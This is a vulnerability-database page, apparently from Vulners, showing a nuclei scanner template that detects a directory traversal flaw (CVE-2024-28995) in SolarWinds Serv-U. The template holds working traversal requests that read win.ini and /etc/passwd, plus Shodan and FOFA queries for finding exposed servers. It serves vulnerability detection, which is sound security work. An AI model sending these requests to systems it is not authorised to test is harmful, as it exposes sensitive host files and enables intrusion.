Lucene search
K

SolarWinds Serv-U - Directory Traversal

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 125 Views

SolarWinds Serv-U Directory Traversal vulnerability allowing access to sensitive file

Related
Refs
Code
id: CVE-2024-28995

info:
  name: SolarWinds Serv-U - Directory Traversal
  author: DhiyaneshDK
  severity: high
  description: |
    SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.
  impact: |
    Attackers can traverse directories and access sensitive files outside the intended directory structure.
  remediation: |
    Update SolarWinds Serv-U to a version that patches the directory traversal vulnerability.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28995
    - https://x.com/stephenfewer/status/1801191416741130575
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-28995
    cwe-id: CWE-22
    epss-score: 0.99614
    epss-percentile: 0.99944
    cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: solarwinds
    product: serv-u
    shodan-query: html:"Serv-U"
    fofa-query: server="Serv-U"
  tags: cve,cve2024,lfi,solarwinds,serv-u,kev,vkev,vuln

http:
  - raw:
      - |
        GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: dsl
        dsl:
          - 'contains(header, "Serv-U")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100b0ceb6ede8c54df8501d24c64f0e4cf591da71d34236048bb9d3c51dbc6ca05a022008bd993746d3f5706456d3ae177b54c3ef7ba309fc96fd4bfd125aa8eaa14e15:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.3High risk
Vulners AI Score8.3
CVSS 3.17.5 - 8.6
EPSS0.99614
SSVC
125